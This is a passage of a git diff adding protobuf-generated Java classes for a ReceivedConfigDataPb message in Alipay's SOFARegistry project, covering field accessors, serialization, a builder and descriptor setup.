{ + return configuratorRegistIds_.getByteString(index); + } + + public static final int DATABOX_FIELD_NUMBER = 5; + private com.alipay.sofa.registry.common.model.client.pb.DataBoxPb dataBox_; + /** .DataBoxPb dataBox = 5; */ + public boolean hasDataBox() { + return dataBox_ != null; + } + /** .DataBoxPb dataBox = 5; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getDataBox() { + return dataBox_ == null + ? com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.getDefaultInstance() + : dataBox_; + } + /** .DataBoxPb dataBox = 5; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder getDataBoxOrBuilder() { + return getDataBox(); + } + + public static final int VERSION_FIELD_NUMBER = 6; + private long version_; + /** int64 version = 6; */ + public long getVersion() { + return version_; + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (!getDataIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, dataId_); + } + if (!getGroupBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 2, group_); + } + if (!getInstanceIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 3, instanceId_); + } + for (int i = 0; i < configuratorRegistIds_.size(); i++) { + com.google.protobuf.GeneratedMessageV3.writeString( + output, 4, configuratorRegistIds_.getRaw(i)); + } + if (dataBox_ != null) { + output.writeMessage(5, getDataBox()); + } + if (version_ != 0L) { + output.writeInt64(6, version_); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (!getDataIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, dataId_); + } + if (!getGroupBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, group_); + } + if (!getInstanceIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, instanceId_); + } + { + int dataSize = 0; + for (int i = 0; i < configuratorRegistIds_.size(); i++) { + dataSize += computeStringSizeNoTag(configuratorRegistIds_.getRaw(i)); + } + size += dataSize; + size += 1 * getConfiguratorRegistIdsList().size(); + } + if (dataBox_ != null) { + size += com.google.protobuf.CodedOutputStream.computeMessageSize(5, getDataBox()); + } + if (version_ != 0L) { + size += com.google.protobuf.CodedOutputStream.computeInt64Size(6, version_); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb other = + (com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb) obj; + + boolean result = true; + result = result && getDataId().equals(other.getDataId()); + result = result && getGroup().equals(other.getGroup()); + result = result && getInstanceId().equals(other.getInstanceId()); + result = result && getConfiguratorRegistIdsList().equals(other.getConfiguratorRegistIdsList()); + result = result && (hasDataBox() == other.hasDataBox()); + if (hasDataBox()) { + result = result && getDataBox().equals(other.getDataBox()); + } + result = result && (getVersion() == other.getVersion()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + DATAID_FIELD_NUMBER; + hash = (53 * hash) + getDataId().hashCode(); + hash = (37 * hash) + GROUP_FIELD_NUMBER; + hash = (53 * hash) + getGroup().hashCode(); + hash = (37 * hash) + INSTANCEID_FIELD_NUMBER; + hash = (53 * hash) + getInstanceId().hashCode(); + if (getConfiguratorRegistIdsCount() > 0) { + hash = (37 * hash) + CONFIGURATORREGISTIDS_FIELD_NUMBER; + hash = (53 * hash) + getConfiguratorRegistIdsList().hashCode(); + } + if (hasDataBox()) { + hash = (37 * hash) + DATABOX_FIELD_NUMBER; + hash = (53 * hash) + getDataBox().hashCode(); + } + hash = (37 * hash) + VERSION_FIELD_NUMBER; + hash = (53 * hash) + com.google.protobuf.Internal.hashLong(getVersion()); + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code ReceivedConfigDataPb} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:ReceivedConfigDataPb) + com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPbOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPbOuterClass + .internal_static_ReceivedConfigDataPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPbOuterClass + .internal_static_ReceivedConfigDataPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb.class, + com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb.Builder.class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + dataId_ = ""; + + group_ = ""; + + instanceId_ = ""; + + configuratorRegistIds_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000008); + if (dataBoxBuilder_ == null) { + dataBox_ = null; + } else { + dataBox_ = null; + dataBoxBuilder_ = null; + } + version_ = 0L; + + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPbOuterClass + .internal_static_ReceivedConfigDataPb_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb build() { + com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb result = + new com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb(this); + int from_bitField0_ = bitField0_; + int to_bitField0_ = 0; + result.dataId_ = dataId_; + result.group_ = group_; + result.instanceId_ = instanceId_; + if (((bitField0_ & 0x00000008) == 0x00000008)) { + configuratorRegistIds_ = configuratorRegistIds_.getUnmodifiableView(); + bitField0_ = (bitField0_ & ~0x00000008); + } + result.configuratorRegistIds_ = configuratorRegistIds_; + if (dataBoxBuilder_ == null) { + result.dataBox_ = dataBox_; + } else { + result.dataBox_ = dataBoxBuilder_.build(); + } + result.version_ = version_; + result.bitField0_ = to_bitField0_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb + .getDefaultInstance()) return this; + if (!other.getDataId().isEmpty()) { + dataId_ = other.dataId_; + onChanged(); + } + if (!other.getGroup().isEmpty()) { + group_ = other.group_; + onChanged(); + } + if (!other.getInstanceId().isEmpty()) { + instanceId_ = other.instanceId_; + onChanged(); + } + if (!other.configuratorRegistIds_.isEmpty()) { + if (configuratorRegistIds_.isEmpty()) { + configuratorRegistIds_ = other.configuratorRegistIds_; + bitField0_ = (bitField0_ & ~0x00000008); + } else { + ensureConfiguratorRegistIdsIsMutable(); + configuratorRegistIds_.addAll(other.configuratorRegistIds_); + } + onChanged(); + } + if (other.hasDataBox()) { + mergeDataBox(other.getDataBox()); + } + if (other.getVersion() != 0L) { + setVersion(other.getVersion()); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private java.lang.Object dataId_ = ""; + /** string dataId = 1; */ + public java.lang.String getDataId() { + java.lang.Object ref = dataId_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + dataId_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string dataId = 1; */ + public com.google.protobuf.ByteString getDataIdBytes() { + java.lang.Object ref = dataId_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + dataId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string dataId = 1; */ + public Builder setDataId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + dataId_ = value; + onChanged(); + return this; + } + /** string dataId = 1; */ + public Builder clearDataId() { + + dataId_ = getDefaultInstance().getDataId(); + onChanged(); + return this; + } + /** string dataId = 1; */ + public Builder setDataIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + dataId_ = value; + onChanged(); + return this; + } + + private java.lang.Object group_ = ""; + /** string group = 2; */ + public java.lang.String getGroup() { + java.lang.Object ref = group_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + group_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string group = 2; */ + public com.google.protobuf.ByteString getGroupBytes() { + java.lang.Object ref = group_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + group_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string group = 2; */ + public Builder setGroup(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + group_ = value; + onChanged(); + return this; + } + /** string group = 2; */ + public Builder clearGroup() { + + group_ = getDefaultInstance().getGroup(); + onChanged(); + return this; + } + /** string group = 2; */ + public Builder setGroupBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + group_ = value; + onChanged(); + return this; + } + + private java.lang.Object instanceId_ = ""; + /** string instanceId = 3; */ + public java.lang.String getInstanceId() { + java.lang.Object ref = instanceId_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + instanceId_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string instanceId = 3; */ + public com.google.protobuf.ByteString getInstanceIdBytes() { + java.lang.Object ref = instanceId_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + instanceId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string instanceId = 3; */ + public Builder setInstanceId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + instanceId_ = value; + onChanged(); + return this; + } + /** string instanceId = 3; */ + public Builder clearInstanceId() { + + instanceId_ = getDefaultInstance().getInstanceId(); + onChanged(); + return this; + } + /** string instanceId = 3; */ + public Builder setInstanceIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + instanceId_ = value; + onChanged(); + return this; + } + + private com.google.protobuf.LazyStringList configuratorRegistIds_ = + com.google.protobuf.LazyStringArrayList.EMPTY; + + private void ensureConfiguratorRegistIdsIsMutable() { + if (!((bitField0_ & 0x00000008) == 0x00000008)) { + configuratorRegistIds_ = + new com.google.protobuf.LazyStringArrayList(configuratorRegistIds_); + bitField0_ |= 0x00000008; + } + } + /** repeated string configuratorRegistIds = 4; */ + public com.google.protobuf.ProtocolStringList getConfiguratorRegistIdsList() { + return configuratorRegistIds_.getUnmodifiableView(); + } + /** repeated string configuratorRegistIds = 4; */ + public int getConfiguratorRegistIdsCount() { + return configuratorRegistIds_.size(); + } + /** repeated string configuratorRegistIds = 4; */ + public java.lang.String getConfiguratorRegistIds(int index) { + return configuratorRegistIds_.get(index); + } + /** repeated string configuratorRegistIds = 4; */ + public com.google.protobuf.ByteString getConfiguratorRegistIdsBytes(int index) { + return configuratorRegistIds_.getByteString(index); + } + /** repeated string configuratorRegistIds = 4; */ + public Builder setConfiguratorRegistIds(int index, java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureConfiguratorRegistIdsIsMutable(); + configuratorRegistIds_.set(index, value); + onChanged(); + return this; + } + /** repeated string configuratorRegistIds = 4; */ + public Builder addConfiguratorRegistIds(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureConfiguratorRegistIdsIsMutable(); + configuratorRegistIds_.add(value); + onChanged(); + return this; + } + /** repeated string configuratorRegistIds = 4; */ + public Builder addAllConfiguratorRegistIds(java.lang.Iterable values) { + ensureConfiguratorRegistIdsIsMutable(); + com.google.protobuf.AbstractMessageLite.Builder.addAll(values, configuratorRegistIds_); + onChanged(); + return this; + } + /** repeated string configuratorRegistIds = 4; */ + public Builder clearConfiguratorRegistIds() { + configuratorRegistIds_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000008); + onChanged(); + return this; + } + /** repeated string configuratorRegistIds = 4; */ + public Builder addConfiguratorRegistIdsBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + ensureConfiguratorRegistIdsIsMutable(); + configuratorRegistIds_.add(value); + onChanged(); + return this; + } + + private com.alipay.sofa.registry.common.model.client.pb.DataBoxPb dataBox_ = null; + private com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder> + dataBoxBuilder_; + /** .DataBoxPb dataBox = 5; */ + public boolean hasDataBox() { + return dataBoxBuilder_ != null || dataBox_ != null; + } + /** .DataBoxPb dataBox = 5; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getDataBox() { + if (dataBoxBuilder_ == null) { + return dataBox_ == null + ? com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.getDefaultInstance() + : dataBox_; + } else { + return dataBoxBuilder_.getMessage(); + } + } + /** .DataBoxPb dataBox = 5; */ + public Builder setDataBox(com.alipay.sofa.registry.common.model.client.pb.DataBoxPb value) { + if (dataBoxBuilder_ == null) { + if (value == null) { + throw new NullPointerException(); + } + dataBox_ = value; + onChanged(); + } else { + dataBoxBuilder_.setMessage(value); + } + + return this; + } + /** .DataBoxPb dataBox = 5; */ + public Builder setDataBox( + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder builderForValue) { + if (dataBoxBuilder_ == null) { + dataBox_ = builderForValue.build(); + onChanged(); + } else { + dataBoxBuilder_.setMessage(builderForValue.build()); + } + + return this; + } + /** .DataBoxPb dataBox = 5; */ + public Builder mergeDataBox(com.alipay.sofa.registry.common.model.client.pb.DataBoxPb value) { + if (dataBoxBuilder_ == null) { + if (dataBox_ != null) { + dataBox_ = + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.newBuilder(dataBox_) + .mergeFrom(value) + .buildPartial(); + } else { + dataBox_ = value; + } + onChanged(); + } else { + dataBoxBuilder_.mergeFrom(value); + } + + return this; + } + /** .DataBoxPb dataBox = 5; */ + public Builder clearDataBox() { + if (dataBoxBuilder_ == null) { + dataBox_ = null; + onChanged(); + } else { + dataBox_ = null; + dataBoxBuilder_ = null; + } + + return this; + } + /** .DataBoxPb dataBox = 5; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder getDataBoxBuilder() { + + onChanged(); + return getDataBoxFieldBuilder().getBuilder(); + } + /** .DataBoxPb dataBox = 5; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder + getDataBoxOrBuilder() { + if (dataBoxBuilder_ != null) { + return dataBoxBuilder_.getMessageOrBuilder(); + } else { + return dataBox_ == null + ? com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.getDefaultInstance() + : dataBox_; + } + } + /** .DataBoxPb dataBox = 5; */ + private com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder> + getDataBoxFieldBuilder() { + if (dataBoxBuilder_ == null) { + dataBoxBuilder_ = + new com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder>( + getDataBox(), getParentForChildren(), isClean()); + dataBox_ = null; + } + return dataBoxBuilder_; + } + + private long version_; + /** int64 version = 6; */ + public long getVersion() { + return version_; + } + /** int64 version = 6; */ + public Builder setVersion(long value) { + + version_ = value; + onChanged(); + return this; + } + /** int64 version = 6; */ + public Builder clearVersion() { + + version_ = 0L; + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:ReceivedConfigDataPb) + } + + // @@protoc_insertion_point(class_scope:ReceivedConfigDataPb) + private static final com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public ReceivedConfigDataPb parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new ReceivedConfigDataPb(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.ReceivedConfigDataPb + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedConfigDataPbOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedConfigDataPbOrBuilder.java new file mode 100644 index 000000000..0952c7def --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedConfigDataPbOrBuilder.java @@ -0,0 +1,57 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface ReceivedConfigDataPbOrBuilder + extends + // @@protoc_insertion_point(interface_extends:ReceivedConfigDataPb) + com.google.protobuf.MessageOrBuilder { + + /** string dataId = 1; */ + java.lang.String getDataId(); + /** string dataId = 1; */ + com.google.protobuf.ByteString getDataIdBytes(); + + /** string group = 2; */ + java.lang.String getGroup(); + /** string group = 2; */ + com.google.protobuf.ByteString getGroupBytes(); + + /** string instanceId = 3; */ + java.lang.String getInstanceId(); + /** string instanceId = 3; */ + com.google.protobuf.ByteString getInstanceIdBytes(); + + /** repeated string configuratorRegistIds = 4; */ + java.util.List getConfiguratorRegistIdsList(); + /** repeated string configuratorRegistIds = 4; */ + int getConfiguratorRegistIdsCount(); + /** repeated string configuratorRegistIds = 4; */ + java.lang.String getConfiguratorRegistIds(int index); + /** repeated string configuratorRegistIds = 4; */ + com.google.protobuf.ByteString getConfiguratorRegistIdsBytes(int index); + + /** .DataBoxPb dataBox = 5; */ + boolean hasDataBox(); + /** .DataBoxPb dataBox = 5; */ + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getDataBox(); + /** .DataBoxPb dataBox = 5; */ + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder getDataBoxOrBuilder(); + + /** int64 version = 6; */ + long getVersion(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedConfigDataPbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedConfigDataPbOuterClass.java new file mode 100644 index 000000000..8ddfa9d76 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/ReceivedConfigDataPbOuterClass.java @@ -0,0 +1,74 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class ReceivedConfigDataPbOuterClass { + private ReceivedConfigDataPbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor + internal_static_ReceivedConfigDataPb_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_ReceivedConfigDataPb_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\032ReceivedConfigDataPb.proto\032\017DataBoxPb." + + "proto\"\226\001\n\024ReceivedConfigDataPb\022\016\n\006dataId" + + "\030\001 \001(\t\022\r\n\005group\030\002 \001(\t\022\022\n\ninstanceId\030\003 \001(" + + "\t\022\035\n\025configuratorRegistIds\030\004 \003(\t\022\033\n\007data" + + "Box\030\005 \001(\0132\n.DataBoxPb\022\017\n\007version\030\006 \001(\003B7" + + "\n/com.alipay.sofa.registry.common.model." + + "client.pbP\001Z\002pbb\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, + new com.google.protobuf.Descriptors.FileDescriptor[] { + com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOuterClass.getDescriptor(), + }, + assigner); + internal_static_ReceivedConfigDataPb_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_ReceivedConfigDataPb_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_ReceivedConfigDataPb_descriptor, + new java.lang.String[] { + "DataId", "Group", "InstanceId", 